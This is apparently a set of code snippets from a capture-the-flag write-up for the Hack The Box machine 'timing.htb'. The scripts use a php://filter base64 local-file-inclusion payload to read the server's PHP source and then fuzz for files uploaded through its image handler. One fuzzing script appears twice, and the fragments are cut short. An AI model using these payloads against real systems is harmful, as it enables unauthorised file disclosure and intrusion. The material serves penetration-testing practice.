0xj0y

#!/usr/bin/python3

import requests
import base64

with open('php_pages.lst','r') as p:
    pages = [x.strip() for x in p if x]

for page in pages:
    url = f'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource={page}'

0xj0y

<?php
include("admin_auth_check.php");

$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}

$file_hash = uniqid();

0xj0y

#!/usr/bin/python3

import subprocess
import requests

def fuzz(file_name):
    url = 'http://timing.htb/images/uploads/' + file_name
    res = requests.get(url)
    if res.status_code != 404:
        print(f'[+] Found the file at {url}')

0xj0y

#!/usr/bin/python3

import subprocess
import requests

def fuzz(file_name):
	url = 'http://timing.htb/images/uploads/' + file_name
	r = requests.get(url)
	if r.status_code != 404:
		print(f'[+] Found the file at {url}')